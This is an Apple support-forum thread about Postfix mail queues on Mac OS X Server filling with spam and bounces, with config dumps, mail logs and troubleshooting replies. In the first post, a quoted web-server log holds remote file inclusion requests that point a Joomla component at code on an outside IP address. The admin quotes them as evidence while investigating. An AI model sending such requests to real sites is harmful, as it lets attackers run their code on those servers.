Mail Queue Filling Up - Spam?

Hi All,
Over the weekend the mail queue in SA filled up. This morning some users where complaining about outgoing messages not being delivered. When I checked the mail queue it had about 500 messages in it. All of them looked liked spam. When I deleted them, outgoing messages started being delivered.
I have no idea why that would happen. Could it mean a hacked machine on the network? I've turned off all of my window's machines overnight to see what happens.
here is my config file.
mail:~ warnersmith$ postconf -n
alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
debugpeerlevel = 2
enableserveroptions = yes
html_directory = no
inet_interfaces = all
localrecipientmaps =
luser_relay = postofficebox
mail_owner = postfix
mailboxsizelimit = 0
mailbox_transport = cyrus
mailq_path = /usr/bin/mailq
manpage_directory = /usr/share/man
mapsrbldomains =
messagesizelimit = 20971520
mydestination = $myhostname,localhost.$mydomain,mail.sk.com,66.XXX.8.132,10.0.0.132,sk.com,skde sign.com
mydomain = sk.com
mydomain_fallback = localhost
myhostname = sk.com
mynetworks = 127.0.0.1/32,10.0.0.1/32,206.XXX.192.99
mynetworks_style = host
newaliases_path = /usr/bin/newaliases
ownerrequestspecial = no
queue_directory = /private/var/spool/postfix
readme_directory = /usr/share/doc/postfix
recipient_delimiter = +
relayhost = mail.chrl.twtelecom.net
sample_directory = /usr/share/doc/postfix/examples
sendmail_path = /usr/sbin/sendmail
setgid_group = postdrop
smtpdclientrestrictions = permit_mynetworks hash:/etc/postfix/smtpdreject rejectrblclient sbl.spamhaus.org permit
smtpdpw_server_securityoptions = gssapi,cram-md5,login
smtpdrecipientrestrictions = permitsasl_authenticated,permit_mynetworks,reject_unauthdestination,permit
smtpdsasl_authenable = yes
smtpdtls_certfile = /etc/postfix/server.pem
smtpdtls_keyfile = $smtpdtls_certfile
smtpduse_pwserver = yes
unknownlocal_recipient_rejectcode = 550
MacBook Pro 2.0 GHz 1 GB RAM   Mac OS X (10.4.6)  

Thanks Jeff. I think the code injection maybe it. I have the server set to relay all outgoing messages to our ISP's mail server. When I look at the messages in the mail queue, all of them seem to be bounce backs from the ISP (domain name does not exist.)
When I look at the mail log for one the messages with the ID of 39E33163839, I see:
Oct 10 13:20:11 mail postfix/smtpd[1697]: connect from unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/smtpd[1697]: 5EB9115C71D: client=unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/cleanup[1698]: 5EB9115C71D: message-id=<[email protected]>
Oct 10 13:20:11 mail postfix/qmgr[4726]: 5EB9115C71D: from=<[email protected]>, size=1904, nrcpt=1 (queue active)
Oct 10 20:11:02 mail postfix/qmgr[4726]: C6C32162E2F: from=, size=28300, nrcpt=1 (queue active)
Oct 10 20:11:02 mail postfix/smtp[13214]: C6C32162E2F: host relay.mail.twtelecom.net[216.136.102.250] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
Oct 10 20:11:03 mail postfix/smtp[13214]: C6C32162E2F: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.54.204.190], delay=3698, status=deferred (host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
Oct 10 20:11:49 mail postfix/smtpd[13189]: connect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:50 mail postfix/smtpd[13189]: 37C60163818: client=c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:50 mail postfix/cleanup[13178]: 37C60163818: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
Oct 10 20:11:51 mail postfix/qmgr[4726]: 37C60163818: from=<[email protected]>, size=26446, nrcpt=1 (queue active)
Oct 10 20:11:51 mail postfix/smtpd[13189]: disconnect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:55 mail postfix/smtpd[13182]: connect from localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/smtpd[13182]: F29EA163837: client=localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/cleanup[13178]: F29EA163837: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
Oct 10 20:11:56 mail postfix/smtpd[13182]: disconnect from localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: from=<[email protected]>, size=27040, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/smtp[13179]: 37C60163818: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=6, status=bounced (host 127.0.0.1[127.0.0.1] said: 550 5.7.1 Message content rejected, UBE, id=13135-02 (in reply to end of DATA command))
Oct 10 20:11:56 mail postfix/cleanup[13178]: 39E33163839: message-id=<[email protected]>
Oct 10 20:11:56 mail postfix/qmgr[4726]: 39E33163839: from=, size=28311, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/qmgr[4726]: 37C60163818: removed
Oct 10 20:11:56 mail postfix/pipe[13184]: F29EA163837: to=<[email protected]>, relay=cyrus, delay=1, status=sent (sk.com)
Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: removed
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.136.95.10], delay=0, status=deferred (host relay.mail.twtelecom.net[216.136.95.10] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
When I look at the HTTPD logs for that same minute, I see:
69.231.131.52 - - [10/Oct/2006:14:20:11 -0400] "GET /pages/facility_02.html HTTP/1.1" 200 12193
216.120.232.145 - - [10/Oct/2006:20:11:09 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
194.52.202.141 - - [10/Oct/2006:20:11:36 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.3.jpg HTTP/1.1" 200 5338
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.4.jpg HTTP/1.1" 200 6872
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.5.jpg HTTP/1.1" 200 3360
The line "//components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -" seem to be that code injection. We don't have a file named sitemap.xml.php on our website.
Am I correct that this is a code injection?
I have three site running on this server. One is a plain old static site for the company it does not use PHP. One is webmail that came with OS X. The final one is an file storage site that does use PHP. It's a commercial code called Copper Project. I've turned off the site overnight to see if this still happens.
The link in in Jeff's post seems to suggest a simple fix. However, I know nothing about PHP programing, so this is beyond me.
Thanks
Henry
MacBook Pro 2.0 GHz 1 GB RAM   Mac OS X (10.4.6)  

Similar Messages

  • Outgoing mail queue fills with spam

    I remember reading about how to fix this before - but cannot find the details now.
    I have a server that is trying to send mail to non existant domains or non existant e-mail addressed. the mail is not originating from clients.
    Typical entry in the mail queue is
    Message ID: 60D7987570
    Date: Thu Aug 17 06:18:36
    Size: 34446
    Sender: MAILER-DAEMON
    Recipient(s) & Status:
    [email protected]:
    host mail.cncnet.net[210.53.130.195] said: 450 4.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table (in reply to RCPT TO command
    how can I sent the mail server up to just ditch this stuff in the first place.
    Tim

    Here is an extract from the logs. I think I understand this now and it works as it should - but perhaps you could confirm.
    This message is clearly not stuck in the outgoing queue. From what I can see mail is received from a backup mail relay for a non existent user on this server. When we try to reject it back to sender, if the sender rejects with 550 we bin it.
    I guess the problem is what to do when the receiving mail server fails to respond? I think eventually it times out and we delete the message. Is that correct?
    Aug 18 15:27:00 server postfix/cleanup[20819]: 9F7AAE92EB: message-id=<000001c6c2d2$2aae8940$d73fa8c0@hpcsece>
    Aug 18 15:27:00 server postfix/qmgr[17315]: 9F7AAE92EB: from=<[email protected]>, size=3353, nrcpt=1 (queue active)
    Aug 18 15:27:00 server postfix/smtpd[20816]: disconnect from scanner.datacenta.net[217.33.105.206]
    Aug 18 15:27:16 server postfix/smtpd[20827]: connect from localhost[127.0.0.1]
    Aug 18 15:27:16 server postfix/smtpd[20827]: B7FA3E930E: client=localhost[127.0.0.1]
    Aug 18 15:27:16 server postfix/cleanup[20819]: B7FA3E930E: message-id=<000001c6c2d2$2aae8940$d73fa8c0@hpcsece>
    Aug 18 15:27:16 server postfix/qmgr[17315]: B7FA3E930E: from=<[email protected]>, size=3905, nrcpt=1 (queue active)
    Aug 18 15:27:16 server postfix/smtpd[20827]: disconnect from localhost[127.0.0.1]
    Aug 18 15:27:17 server postfix/smtp[20820]: 9F7AAE92EB: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=18, status=sent (250 2.6.0 Ok, id=20277-06, from MTA: 250 Ok: queued as B7FA3E930E)
    Aug 18 15:27:17 server postfix/qmgr[17315]: 9F7AAE92EB: removed
    Aug 18 15:27:17 server postfix/lmtp[20828]: B7FA3E930E: to=<[email protected]>, relay=/var/imap/socket/lmtp[/var/imap/socket/lmtp], delay=1, status=bounced (host /var/imap/socket/lmtp[/var/imap/socket/lmtp] said: 550-Mailbox unknown. Either there is no mailbox associated with this 550-name or you do not have authorization to see it. 550 5.1.1 User unknown (in reply to RCPT TO command))
    Aug 18 15:27:17 server postfix/cleanup[20819]: 38178E9310: message-id=<[email protected]>
    Aug 18 15:27:17 server postfix/qmgr[17315]: 38178E9310: from=, size=6025, nrcpt=1 (queue active)
    Aug 18 15:27:17 server postfix/qmgr[17315]: B7FA3E930E: removed
    Aug 18 15:27:19 server postfix/smtp[20831]: 38178E9310: to=<[email protected]>, relay=bx1.techsolsc.com[65.5.144.18], delay=2, status=bounced (host bx1.techsolsc.com[65.5.144.18] said: 550 <[email protected]>: Recipient address rejected: Unknown user (in reply to RCPT TO command))
    Aug 18 15:27:19 server postfix/qmgr[17315]: 38178E9310: removed

  • Mail queue filling up, delivery real slow

    mail server is: 10.4.2 running on a dual 2 GHz Xserve 1 gig RAM
    2 hard drives. 1 boot, 1 mail store
    my mail queue is filling up with messages that can't be delivered. bad address usually. not sure why they make into the queue in the first place.
    The queue reaches as high a 7000+ messages.
    This is really killing my server. Can anyone shed some light??
    here is postconf output:
    2bounce_notice_recipient = postmaster
    access_map_reject_code = 554
    address_verify_default_transport = $default_transport
    address_verify_local_transport = $local_transport
    address_verify_map =
    address_verify_negative_cache = yes
    address_verify_negative_expire_time = 3d
    address_verify_negative_refresh_time = 3h
    address_verify_poll_count = 3
    address_verify_poll_delay = 3s
    address_verify_positive_expire_time = 31d
    address_verify_positive_refresh_time = 7d
    address_verify_relay_transport = $relay_transport
    address_verify_relayhost = $relayhost
    address_verify_sender = postmaster
    address_verify_service_name = verify
    address_verify_transport_maps = $transport_maps
    address_verify_virtual_transport = $virtual_transport
    alias_database = hash:/etc/aliases
    alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
    allow_mail_to_commands = alias, forward
    allow_mail_to_files = alias, forward
    allow_min_user = no
    allow_percent_hack = yes
    allow_untrusted_routing = no
    alternate_config_directories =
    always_bcc =
    append_at_myorigin = yes
    append_dot_mydomain = yes
    application_event_drain_time = 100s
    backwards_bounce_logfile_compatibility = yes
    berkeley_db_create_buffer_size = 16777216
    berkeley_db_read_buffer_size = 131072
    best_mx_transport =
    biff = yes
    body_checks =
    body_checks_size_limit = 51200
    bounce_notice_recipient = postmaster
    bounce_queue_lifetime = 5d
    bounce_service_name = bounce
    bounce_size_limit = 50000
    broken_sasl_auth_clients = no
    canonical_maps =
    cleanup_service_name = cleanup
    command_directory = /usr/sbin
    command_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
    command_time_limit = 1000s
    config_directory = /etc/postfix
    content_filter = smtp-amavis:[127.0.0.1]:10024
    daemon_directory = /usr/libexec/postfix
    daemon_timeout = 18000s
    debug_peer_level = 2
    debug_peer_list =
    default_database_type = hash
    default_delivery_slot_cost = 5
    default_delivery_slot_discount = 50
    default_delivery_slot_loan = 3
    default_destination_concurrency_limit = 6
    default_destination_recipient_limit = 50
    default_extra_recipient_limit = 1000
    default_minimum_delivery_slots = 3
    default_privs = nobody
    default_process_limit = 20
    default_rbl_reply = $rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}
    default_recipient_limit = 10000
    default_transport = smtp
    default_verp_delimiters = +=
    defer_code = 450
    defer_service_name = defer
    defer_transports =
    delay_notice_recipient = postmaster
    delay_warning_time = 0h
    deliver_lock_attempts = 20
    deliver_lock_delay = 1s
    disable_dns_lookups = no
    disable_mime_input_processing = no
    disable_mime_output_conversion = no
    disable_verp_bounces = no
    disable_vrfy_command = no
    dont_remove = 0
    double_bounce_sender = double-bounce
    duplicate_filter_limit = 1000
    empty_address_recipient = MAILER-DAEMON
    enable_errors_to = no
    enable_original_recipient = yes
    enable_server_options = yes
    error_notice_recipient = postmaster
    error_service_name = error
    expand_owner_alias = no
    export_environment = TZ MAIL_CONFIG
    fallback_relay =
    fallback_transport =
    fast_flush_domains = $relay_domains
    fast_flush_purge_time = 7d
    fast_flush_refresh_time = 12h
    fault_injection_code = 0
    flush_service_name = flush
    fork_attempts = 5
    fork_delay = 1s
    forward_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
    forward_path = $home/.forward${recipient_delimiter}${extension}, $home/.forward
    hash_queue_depth = 1
    hash_queue_names = incoming, active, deferred, bounce, defer, flush, hold, trace
    header_address_token_limit = 10240
    header_checks =
    header_size_limit = 102400
    helpful_warnings = yes
    home_mailbox =
    hopcount_limit = 50
    html_directory = no
    ignore_mx_lookup_error = no
    import_environment = MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY
    in_flow_delay = 1s
    inet_interfaces = all
    initial_destination_concurrency = 4
    invalid_hostname_reject_code = 501
    ipc_idle = 100s
    ipc_timeout = 3600s
    ipc_ttl = 1000s
    line_length_limit = 2048
    lmtp_cache_connection = yes
    lmtp_connect_timeout = 0s
    lmtp_data_done_timeout = 600s
    lmtp_data_init_timeout = 120s
    lmtp_data_xfer_timeout = 180s
    lmtp_destination_concurrency_limit = $default_destination_concurrency_limit
    lmtp_destination_recipient_limit = $default_destination_recipient_limit
    lmtp_lhlo_timeout = 300s
    lmtp_mail_timeout = 300s
    lmtp_quit_timeout = 300s
    lmtp_rcpt_timeout = 300s
    lmtp_rset_timeout = 120s
    lmtp_sasl_auth_enable = no
    lmtp_sasl_password_maps =
    lmtp_sasl_security_options = noplaintext, noanonymous
    lmtp_send_xforward_command = no
    lmtp_skip_quit_response = no
    lmtp_tcp_port = 24
    lmtp_xforward_timeout = 300s
    local_command_shell =
    local_destination_concurrency_limit = 2
    local_destination_recipient_limit = 1
    local_recipient_maps =
    local_transport = local:$myhostname
    luser_relay = emailadmin
    mail_name = Postfix
    mail_owner = postfix
    mail_release_date = 20040915
    mail_spool_directory = /var/mail
    mail_version = 2.1.5
    mailbox_command =
    mailbox_command_maps =
    mailbox_delivery_lock = flock
    mailbox_size_limit = 0
    mailbox_transport = cyrus
    mailq_path = /usr/bin/mailq
    manpage_directory = /usr/share/man
    maps_rbl_domains =
    maps_rbl_reject_code = 554
    masquerade_classes = envelope_sender, header_sender, header_recipient
    masquerade_domains =
    masquerade_exceptions =
    max_idle = 100s
    max_use = 100
    maximal_backoff_time = 2700s
    maximal_queue_lifetime = 36h
    message_size_limit = 16777216
    mime_boundary_length_limit = 2048
    mime_header_checks = $header_checks
    mime_nesting_limit = 100
    minimal_backoff_time = 900s
    multi_recipient_bounce_reject_code = 550
    mydestination = $myhostname,localhost.$mydomain,myDomain.com,mail.myDomain.com
    mydomain = myDomain.com
    mydomain_fallback = localhost
    myhostname = myDomain.com
    mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
    mynetworks_style = host
    myorigin = $myhostname
    nested_header_checks = $header_checks
    newaliases_path = /usr/bin/newaliases
    non_fqdn_reject_code = 504
    notify_classes = resource, software
    owner_request_special = no
    parent_domain_matches_subdomains = debug_peer_list,fast_flush_domains,mynetworks,permit_mx_backup_networks,qmqpd_a uthorized_clients,relay_domains,smtpd_access_maps
    permit_mx_backup_networks =
    pickup_service_name = pickup
    prepend_delivered_header = command, file, forward
    process_id_directory = pid
    propagate_unmatched_extensions = canonical, virtual
    proxy_interfaces =
    proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
    qmgr_clog_warn_time = 300s
    qmgr_fudge_factor = 100
    qmgr_message_active_limit = 20000
    qmgr_message_recipient_limit = 20000
    qmgr_message_recipient_minimum = 10
    qmqpd_authorized_clients =
    qmqpd_error_delay = 1s
    qmqpd_timeout = 300s
    queue_directory = /private/var/spool/postfix
    queue_file_attribute_count_limit = 100
    queue_minfree = 0
    queue_run_delay = 900s
    queue_service_name = qmgr
    rbl_reply_maps =
    readme_directory = /usr/share/doc/postfix
    receive_override_options =
    recipient_bcc_maps =
    recipient_canonical_maps =
    recipient_delimiter = +
    reject_code = 554
    relay_clientcerts =
    relay_destination_concurrency_limit = $default_destination_concurrency_limit
    relay_destination_recipient_limit = $default_destination_recipient_limit
    relay_domains = $mydestination
    relay_domains_reject_code = 554
    relay_recipient_maps =
    relay_transport = relay
    relayhost =
    relocated_maps =
    require_home_directory = no
    resolve_dequoted_address = yes
    resolve_null_domain = no
    rewrite_service_name = rewrite
    sample_directory = /usr/share/doc/postfix/examples
    sender_based_routing = no
    sender_bcc_maps =
    sender_canonical_maps =
    sendmail_path = /usr/sbin/sendmail
    service_throttle_time = 60s
    setgid_group = postdrop
    show_user_unknown_table_name = yes
    showq_service_name = showq
    smtp_always_send_ehlo = yes
    smtp_bind_address =
    smtp_connect_timeout = 30s
    smtp_data_done_timeout = 600s
    smtp_data_init_timeout = 120s
    smtp_data_xfer_timeout = 180s
    smtp_defer_if_no_mx_address_found = no
    smtp_destination_concurrency_limit = $default_destination_concurrency_limit
    smtp_destination_recipient_limit = $default_destination_recipient_limit
    smtp_enforce_tls = no
    smtp_helo_name = $myhostname
    smtp_helo_timeout = 300s
    smtp_host_lookup = dns
    smtp_line_length_limit = 990
    smtp_mail_timeout = 300s
    smtp_mx_address_limit = 0
    smtp_mx_session_limit = 2
    smtp_never_send_ehlo = no
    smtp_pix_workaround_delay_time = 10s
    smtp_pix_workaround_threshold_time = 500s
    smtp_quit_timeout = 300s
    smtp_quote_rfc821_envelope = yes
    smtp_randomize_addresses = yes
    smtp_rcpt_timeout = 300s
    smtp_rset_timeout = 120s
    smtp_sasl_auth_enable = no
    smtp_sasl_password_maps =
    smtp_sasl_security_options = noplaintext, noanonymous
    smtp_sasl_tls_security_options = $var_smtp_sasl_opts
    smtp_sasl_tls_verified_security_options = $var_smtp_sasl_tls_opts
    smtp_send_xforward_command = no
    smtp_skip_5xx_greeting = yes
    smtp_skip_quit_response = yes
    smtp_starttls_timeout = 300s
    smtp_tls_CAfile =
    smtp_tls_CApath =
    smtp_tls_cert_file =
    smtp_tls_cipherlist =
    smtp_tls_dcert_file =
    smtp_tls_dkey_file = $smtp_tls_dcert_file
    smtp_tls_enforce_peername = yes
    smtp_tls_key_file = $smtp_tls_cert_file
    smtp_tls_loglevel = 0
    smtp_tls_note_starttls_offer = no
    smtp_tls_per_site =
    smtp_tls_scert_verifydepth = 5
    smtp_tls_session_cache_database =
    smtp_tls_session_cache_timeout = 3600s
    smtp_use_tls = no
    smtp_xforward_timeout = 300s
    smtpd_authorized_verp_clients = $authorized_verp_clients
    smtpd_authorized_xclient_hosts =
    smtpd_authorized_xforward_hosts =
    smtpd_banner = $myhostname ESMTP $mail_name
    smtpd_client_connection_count_limit = 50
    smtpd_client_connection_limit_exceptions = $mynetworks
    smtpd_client_connection_rate_limit = 0
    smtpd_client_restrictions = check_recipient_access hash:/etc/postfix/access, permit_sasl_authenticated, permit_mynetworks, check_sender_access hash:/etc/postfix/whiteList, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_rbl_client dnsbl.njabl.org, reject_rbl_client sbl-xbl.spamhaus.org, reject_rbl_client bl.spamcop.net, reject_rbl_client cbl.abuseat.org
    smtpd_data_restrictions =
    smtpd_delay_reject = yes
    smtpd_enforce_tls = no
    smtpd_error_sleep_time = 1s
    smtpd_etrn_restrictions =
    smtpd_expansion_filter = \t\40!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghi jklmnopqrstuvwxyz{|}~
    smtpd_hard_error_limit = 20
    smtpd_helo_required = no
    smtpd_helo_restrictions =
    smtpd_history_flush_threshold = 100
    smtpd_junk_command_limit = 100
    smtpd_noop_commands =
    smtpd_null_access_lookup_key =
    smtpd_policy_service_max_idle = 300s
    smtpd_policy_service_max_ttl = 1000s
    smtpd_policy_service_timeout = 100s
    smtpd_proxy_ehlo = $myhostname
    smtpd_proxy_filter =
    smtpd_proxy_timeout = 100s
    smtpd_pw_server_security_options = login,plain,cram-md5,gssapi
    smtpd_recipient_limit = 1000
    smtpd_recipient_overshoot_limit = 1000
    smtpd_recipient_restrictions = check_recipient_access hash:/etc/postfix/access, permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unauth_destination, check_sender_access hash:/etc/postfix/whiteList
    smtpd_reject_unlisted_recipient = yes
    smtpd_reject_unlisted_sender = no
    smtpd_restriction_classes =
    smtpd_sasl_application_name = smtpd
    smtpd_sasl_auth_enable = yes
    smtpd_sasl_exceptions_networks =
    smtpd_sasl_local_domain =
    smtpd_sasl_security_options = noanonymous
    smtpd_sasl_tls_security_options = $smtpd_sasl_security_options
    smtpd_sender_login_maps =
    smtpd_sender_restrictions =
    smtpd_soft_error_limit = 10
    smtpd_starttls_timeout = 300s
    smtpd_timeout = 300s
    smtpd_tls_CAfile =
    smtpd_tls_CApath =
    smtpd_tls_ask_ccert = no
    smtpd_tls_auth_only = no
    smtpd_tls_ccert_verifydepth = 5
    smtpd_tls_cert_file = /etc/certificates/mail.myDomain.com.crt
    smtpd_tls_cipherlist =
    smtpd_tls_dcert_file =
    smtpd_tls_dh1024_param_file =
    smtpd_tls_dh512_param_file =
    smtpd_tls_dkey_file = $smtpd_tls_dcert_file
    smtpd_tls_key_file = /etc/certificates/mail.myDomain.com.key
    smtpd_tls_loglevel = 2
    smtpd_tls_received_header = no
    smtpd_tls_req_ccert = no
    smtpd_tls_session_cache_database =
    smtpd_tls_session_cache_timeout = 3600s
    smtpd_tls_wrappermode = no
    smtpd_use_pw_server = yes
    smtpd_use_tls = yes
    soft_bounce = no
    stale_lock_time = 500s
    strict_7bit_headers = no
    strict_8bitmime = no
    strict_8bitmime_body = no
    strict_mime_encoding_domain = no
    strict_rfc821_envelopes = no
    sun_mailtool_compatibility = no
    swap_bangpath = yes
    syslog_facility = mail
    syslog_name = postfix
    tls_daemon_random_bytes = 32
    tls_daemon_random_source =
    tls_random_bytes = 32
    tls_random_exchange_name = ${config_directory}/prng_exch
    tls_random_prng_update_period = 60s
    tls_random_reseed_period = 3600s
    tls_random_source =
    trace_service_name = trace
    transport_maps =
    transport_retry_time = 60s
    trigger_timeout = 10s
    undisclosed_recipients_header = To: undisclosed-recipients:;
    unknown_address_reject_code = 450
    unknown_client_reject_code = 450
    unknown_hostname_reject_code = 450
    unknown_local_recipient_reject_code = 550
    unknown_relay_recipient_reject_code = 550
    unknown_virtual_alias_reject_code = 550
    unknown_virtual_mailbox_reject_code = 550
    unverified_recipient_reject_code = 450
    unverified_sender_reject_code = 450
    verp_delimiter_filter = -=+
    virtual_alias_domains = $virtual_alias_maps
    virtual_alias_expansion_limit = 1000
    virtual_alias_maps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
    virtual_alias_recursion_limit = 1000
    virtual_destination_concurrency_limit = $default_destination_concurrency_limit
    virtual_destination_recipient_limit = $default_destination_recipient_limit
    virtual_gid_maps =
    virtual_mailbox_base =
    virtual_mailbox_domains = hash:/etc/postfix/virtual_domains
    virtual_mailbox_limit = 51200000
    virtual_mailbox_lock = fcntl
    virtual_mailbox_maps =
    virtual_minimum_uid = 100
    virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp
    virtual_uid_maps =

    I do have a few Windows clients. They have up to date virus protection but they could very well be infected with some malware. I haven't had the chance to run SpyBot on them.
    Sorry for the long postconf output.
    I did requeue all the messages with postsuper -r. I also put them all on hold (postsuper -h) which allowed for new messages to be delivered as usual. Deleting the queue was not an option. I am pretty sure now that it was a spam dictionary attack. But I am still concerned that this would effectively bring the server down.
    I looked into recipient restrictions but don't see any easy way to maintain an accurate list of my users. Is there a way to pull them from the LDAP directory? I guess I could do that with a perl script, shouldn't be too hard. Is there an easier way? Something built in?
    Anyway the server is fine now. As I said I put all the messages on hold then slowly released them back into the active queue. Once the server was able to get over its hang up it chewed through the remaining messages ok. This still brought my server down pretty much the entire day. Not acceptable in most countries.
    Any other ideas are welcome!
    Thanks,
    Josh
    shorter postconf output:
    alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
    always_bcc =
    bouncequeuelifetime = 4h
    command_directory = /usr/sbin
    config_directory = /etc/postfix
    content_filter = smtp-amavis:[127.0.0.1]:10024
    daemon_directory = /usr/libexec/postfix
    debugpeerlevel = 2
    defaultdestination_concurrencylimit = 6
    defaultprocesslimit = 20
    enableserveroptions = yes
    inet_interfaces = all
    initialdestinationconcurrency = 15
    localrecipientmaps =
    luser_relay = emailadmin
    mail_owner = postfix
    mailboxsizelimit = 0
    mailbox_transport = cyrus
    mailq_path = /usr/bin/mailq
    manpage_directory = /usr/share/man
    mapsrbldomains =
    maximalbackofftime = 2700s
    maximalqueuelifetime = 36h
    messagesizelimit = 16777216
    minimalbackofftime = 900s
    mydestination = $myhostname,localhost.$mydomain,myDomain.com
    mydomain_fallback = localhost
    myhostname = thestranger.com
    mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
    mynetworks_style = host
    newaliases_path = /usr/bin/newaliases
    ownerrequestspecial = no
    queue_directory = /private/var/spool/postfix
    queuerundelay = 900s
    readme_directory = /usr/share/doc/postfix
    recipient_delimiter = +
    relayhost =
    sample_directory = /usr/share/doc/postfix/examples
    sendmail_path = /usr/sbin/sendmail
    setgid_group = postdrop
    smtpconnecttimeout = 15s
    smtphelotimeout = 30s
    smtpdclientrestrictions = checkrecipientaccess hash:/etc/postfix/access, permitsaslauthenticated, permit_mynetworks, checksenderaccess hash:/etc/postfix/whiteList, rejectinvalidhostname, rejectnon_fqdnsender, rejectnon_fqdnrecipient, rejectrblclient dnsbl.njabl.org, rejectrblclient sbl-xbl.spamhaus.org, rejectrblclient bl.spamcop.net, rejectrblclient cbl.abuseat.org
    smtpdenforcetls = no
    smtpdpw_server_securityoptions = login,plain,cram-md5,gssapi
    smtpdrecipientrestrictions = checkrecipientaccess hash:/etc/postfix/access, permit_mynetworks, permitsaslauthenticated, rejectinvalidhostname, rejectnon_fqdnsender, rejectnon_fqdnrecipient, rejectunknown_senderdomain, rejectunauthdestination, checksenderaccess hash:/etc/postfix/whiteList
    smtpdsasl_authenable = yes
    smtpdtls_certfile = /etc/certificates//myDomain.com.crt
    smtpdtls_keyfile = /etc/certificates/myDomain.com.key
    smtpdtlsloglevel = 2
    smtpduse_pwserver = yes
    smtpdusetls = yes
    unknownlocal_recipient_rejectcode = 550
    virtualaliasmaps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
    virtualmailboxdomains = hash:/etc/postfix/virtual_domains
    virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp

  • Mail queue filling up - Delivery Temporarily Suspended Connection Refused

    About 2 hours ago we stopped getting any email from our server. The mail queue is filling up. If I click on one of the messages in queue, it gives me a message of "delivery temporarily suspended: connect to 127.0.0.1[127.0.0.1]: connection refused".
    What happened????
    Thanks,
    Robert

    My configuration was running fine for months but suddenly every night amavisd stops running (I suppose after mailbfr ran). I have to launch amavisd manually with +sudo /bin/launchctl load -w /System/Library/LaunchDaemons/org.amavis.amavisd.plist+ every day.
    Maybe something is wrong with my org.amavis.amavisd.plist? Here is it:
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>Label</key>
    <string>org.amavis.amavisd</string>
    <key>OnDemand</key>
    <false/>
    <key>Program</key>
    <string>/usr/bin/amavisd</string>
    <key>ProgramArguments</key>
    <array>
    <string>amavisd</string>
    <string>foreground</string>
    </array>
    <key>ServiceIPC</key>
    <false/>
    <key>UserName</key>
    <string>_amavisd</string>
    </dict>
    </plist>

  • Mail queue filling with errors, is something broken?

    Back in SL, I was able to just look at the queue in server app and if it ever had anything in it, I knew it was a problem and I usually could deal with it.
    But in ML, you have to issue "mailq" in terminal to see it. So I did that a lot when first set up, and everything seemed fine.
